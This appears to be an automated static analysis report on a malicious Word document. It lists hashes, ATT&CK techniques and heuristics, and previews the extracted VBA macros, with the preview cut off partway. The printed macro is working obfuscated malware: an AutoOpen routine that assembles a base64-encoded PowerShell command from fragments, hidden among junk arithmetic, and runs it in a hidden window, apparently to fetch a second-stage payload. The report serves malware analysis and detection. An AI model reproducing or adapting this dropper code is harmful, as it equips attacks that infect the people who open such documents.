Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 faba01a91a8a1d54…

MALICIOUS

Office (OLE)

Size: 105.5 KB
Created: 2018-06-01 15:54:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: e86b0be693e56330e42e5037ecf16fda
SHA-1: a318b4a439f6ca329cb882f9bf9515cedbc45e54
SHA-256: faba01a91a8a1d54de6b9a00f65c8ccf64bbfe9990ae1073d3446f8293595839
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The critical OLE_VBA_SHELL heuristic indicates a Shell() call inside the VBA macros, and the Autoopen macro invokes it, so the call runs when the document is opened. The macro assembles a PowerShell command from string fragments and executes it hidden (vbHide), most likely to download and run a second-stage payload. Because the script is obfuscated and no IOCs beyond the shell command itself were recovered, a higher-confidence assessment is not possible from static analysis alone.

Heuristics (6)

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  10650 bytes
SHA-256: a50f4f6d48ffa8332ba4c36f328ddfcd185a9f6eb34edfc1e56ffb542f5f5a29
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "tdFNRaQVsjio"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uibHIc()
On Error Resume Next
YuOaOu = 74629 + Log(55957) - IDlKlO / Atn(84854) / jTziu / zOJji
zisoU = CSng(56708 * CInt(51425) + 47295 - 4207)
PVCqOP = 39850 + Log(47690) - hcwzn / Atn(6854) / drQLFK / JfiKw
HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968)
uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA)
ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk
QZCiRU = CSng(80585 * CInt(6357) + 33383 - 53648)
End Function
Sub Autoopen()
On Error Resume Next
GLRHEL = 29975 + Log(98584) - LmsEdW / Atn(3076) / GjOXU / IahZZ
PNbjn = CSng(97547 * CInt(23222) + 34230 - 99088)
uibHIc
waJmQd = 63027 + Log(95393) - uTbwi / Atn(26573) / lBIjW / piizKJ
iKjOQ = CSng(74018 * CInt(76863) + 26414 - 64589)
End Sub


Attribute VB_Name = "ftjTiBnQtVNMKJ"
Function JiHJpfwpl()
On Error Resume Next
GUYOE = 81629 + Log(61093) - aoEWBA / Atn(16526) / wJuodU / ZDoud
OKaNEH = CSng(24403 * CInt(27696) + 93931 - 88975)
RpzYtmjGdh = "owersHeLL -" + "e KABu" + "AGUAVwAtA" + "G8AQ" + "gBKAGUAQ" + "wB" + "UACAAaQBPAC4A" + "YwBPAE0AcAByAGU" + "AUwB" + "zAGkATwBOAC4AZ"
IFkkjp = 7898 + Log(50958) - KmwkU / Atn(55466) / JwLQwC / LddIw
vOCPGj = CSng(46565 * CInt(69153) + 50431 - 87454)
OsSdfpaUk = "ABl" + "AEYAbABh" + "AH" + "QAZQBTA" + "HQ" + "AUg"
kTGTc = 23198 + Log(82171) - cVCPld / Atn(84274) / kYHCj / hbvki
oECjFz = CSng(61796 * CInt(54059) + 93131 - 3009)
dRBwwqHbqj = "BlA" + "EEATQAoAF" + "sA" + "cw" + "B5AFMAdAB" + "FAG0ALgB" + "pAE8AL" + "gBtAGUAbQBvAFIA"
RmQUYs = 98530 + Log(32124) - PaoLTq / Atn(63481) / miYsdN / XTTKn
PJippQ = CSng(31555 * CInt(75540) + 17375 - 66142)
jpQbjBsBDRE = "WQBzAHQAUg" + "BFAGEATQBdACAAW" + "wBDAG8ATgB2A" + "GUAcgB0AF0AOgA6"
TzOOQr = 31652 + Log(28204) - DpRdq / Atn(77289) / MwFZo / ozRFVd
QpdwbZ = CSng(61732 * CInt(98676) + 79423 - 13351)
HnXhIniPUfH = "AEYAcgBP" + "AE0AY" + "gBBAHMA" + "RQA2ADQAUwBUAFI" + "ASQBOA" + "GcAKAAn" + "AFQAWg"
CvWuar = 9907 + Log(98593) - qDqEI / Atn(14712) / IOzLWn / AOLVBR
ZXpdW = CSng(86660 * CInt(12359) + 88408 - 48107)
juhpbi = "BKA" + "FIAYg" + "A1A" + "HMAdwBGAEkAWAB" + "mAEoA" + "KwAwAC8AVw" + "BCAEcAcQBRAFQ" + "AU"
AVbjM = 98004 + Log(49527) - TiXkrv / Atn(11216) / HWjOW / htRjA
mOjOpX = CSng(20825 * CInt(372) + 22571 - 9276)
sEfSoZ = "gBtAG" + "IAVgArAG0Ab" + "wBrAG4AZABFAGs" + "AMw" + "BLA" + "FMALw" + "BiAE" + "EAcABxADcAUw" + "BI" + "AG4AQw"
JiHJpfwpl = RpzYtmjGdh + OsSdfpaUk + dRBwwqHbqj + jpQbjBsBDRE + HnXhIniPUfH + juhpbi + sEfSoZ
End Function
Function waotA()
On Error Resume Next
Plhhik = 79520 + Log(60168) - XGljNK / Atn(6315) / ohSfww / FzIuT
FDCjRd = CSng(77331 * CInt(41412) + 98133 - 16888)
DQQVlUzJkUJ = "Bj" + "AEcAMg" + "BBAE" + "YARwA0AEUAVABpA" + "HEATAA4ADk" + "AOQAxAEQA"
BGDfdz = 2124 + Log(60670) - NMdmH / Atn(32049) / jcjcuL / RCiAw
PbpZqi = CSng(84381 * CInt(91021) + 41115 - 54621)
dzHiidcVtqU = "cwByAFoA" + "SQAxAD" + "kAagBtADgAegAz" + "AG4ANABo" + "AHYAWQBYAG0AOQ" + "AxAHYAeA" + "BWA" + "GYA"
HPzXta = 31286 + Log(52699) - qHtPj / Atn(63814) / zlcuzE / FmWEvd
rLzkU = CSng(59980 * CInt(23107) + 73013 - 46318)
zItaivYNiiX = "eABGAFUAbwB" + "yAF" + "kAdwBsAHkAVABpA" + "FUAdwA5AHgAdA" + "Av" + "AG0ASgBoAFo" + "AQgBSAEwATAB" + "5AFAAUg"
SZwrHi = 49473 + Log(86021) - ouJsi / Atn(254) / QtkWV / wbwvt
LBiLNA = CSng(52830 * CInt(49103) + 16444 - 14214)
hUPPifK = "BhAGIAdAAxA" + "FQAUgBv" + "ADg" + "AUABm" + "ADEAaQBWAGoA" + "SABMAG8AQgB3AE" + "EAdgA3AEUAV"
EzLmoi = 65654 + Log(36701) - kSOSB / Atn(2769) / wbUsM / uhHKiv
GauJvj = CSng(48907 * CInt(18721) + 66342 - 18185)
oVRiWa = "ABHAG8AbABzA" + "DcARA" + "AwADEAYQB" + "rADEAZQ" + "BQAGQASgBtA" + "FUAVg" + "BkA" + "GsA" + "ZgBS" + "AHEAcwBzADI"
Qcbutn = 22775 + Log(19
... (truncated)